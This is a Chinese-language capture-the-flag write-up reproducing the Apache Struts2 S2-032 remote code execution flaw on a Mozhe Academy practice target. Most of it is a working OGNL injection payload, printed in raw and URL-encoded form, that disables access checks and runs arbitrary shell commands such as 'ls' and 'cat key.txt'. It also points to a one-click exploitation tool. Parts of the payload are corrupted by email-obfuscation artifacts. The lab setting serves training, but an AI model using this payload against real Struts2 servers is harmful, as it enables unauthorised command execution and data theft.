墨者學院之Apache Struts2遠程代碼執行漏洞(S2-032)復現

本題的解題方向是struts2的S2-032漏洞，啓用動態方法調用時，可以通過方法：前綴執行遠程代碼執行。

method: < name > Action 前綴去調用聲明爲 public 的函數，但是在低版本 的Strtus2中並不會對 name 方法值做 OGNL 計算，反而在高版本中會進行計算。

 

其中需要利用exp進行實現：

首先構造poc

編碼前：由編碼後解析成的代碼

？method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\A&ppp= &encoding=UTF-8&cmd=ls

ls可更換成其他命令

編碼後：

?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ls

在瀏覽器地址欄輸入http://靶場ip/上面編碼後的exp

查看key.txt的值

編碼前：由編碼後解析成的代碼

?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\A&ppp= &encoding=UTF-8&cmd=cat key.txt

 

編碼後：

?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat key.txt

在瀏覽器地址欄輸入http://靶場ip/上面編碼後的exp

 

得到key值！

 

如果不知道exp怎麼辦，沒關係，還有另一種辦法，我們可以利用struts2的漏洞利用檢查工具來進行一鍵式操作

提交方式修改成get方式，然後點擊驗證漏洞

得知有漏洞後，我們可以開始命令執行，在漏洞編號處選擇剛纔掃描出來的漏洞編號。輸入ls命令，可以看到所有的文件。其中看到了key.txt文件。於是我們再輸入cat key.txt命令查看該文件內容，得到了本題的key